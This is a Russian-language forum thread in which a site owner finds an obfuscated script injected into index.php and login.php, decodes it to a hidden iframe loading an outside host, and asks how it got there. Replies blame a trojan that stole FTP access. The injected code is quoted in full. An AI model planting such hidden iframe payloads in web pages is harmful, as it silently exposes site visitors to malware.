Как внедрился код?

[Hsite 0]

Сегодня обнаружил у себя на 2х хостингах в файлах index.php, login.php следующий код "<!--#IFFRAME--><script language="javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%74%6E%78%2E%6E%61%6D%65%2F%69%6E%2E%63%67%69%3F%33%27%20%77%69%64%74%68%3D%27%31%27%20%68%65%69%67%68%74%3D%27%31%27%20%73%74%79%6C%65%3D%27%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%69%66%72%61%6D%65%3E'));</script><!--@IFFRAME-->" Если раскодировать получаем "'<iframe src='http://tnx.name/in.cgi?3' width='1' height='1' style='visibility: hidden;'></iframe>'"

Вопрос, как он туда попал? Позавчера их не было 100%, т.к. магазин грузился нормально, а с появлением кода Outpost стал блокировать загрузку.  На фтп со скриптами я не заходил, вариант, что на компе троян, который прописал код - отпадает. К тому же код прописан избирательно, не во все файлы, а только в часто используемые. Что это, баг магазина?

[support 447]

А почему вариант с трояном отпадает?!

Это именно троян, подхваченный на таком же заражённом сайте.

Не все антивирусы их ловят.

Во всяком случае пододные вещи именно так живут.

[ABerezin 0]

Однозначно троян.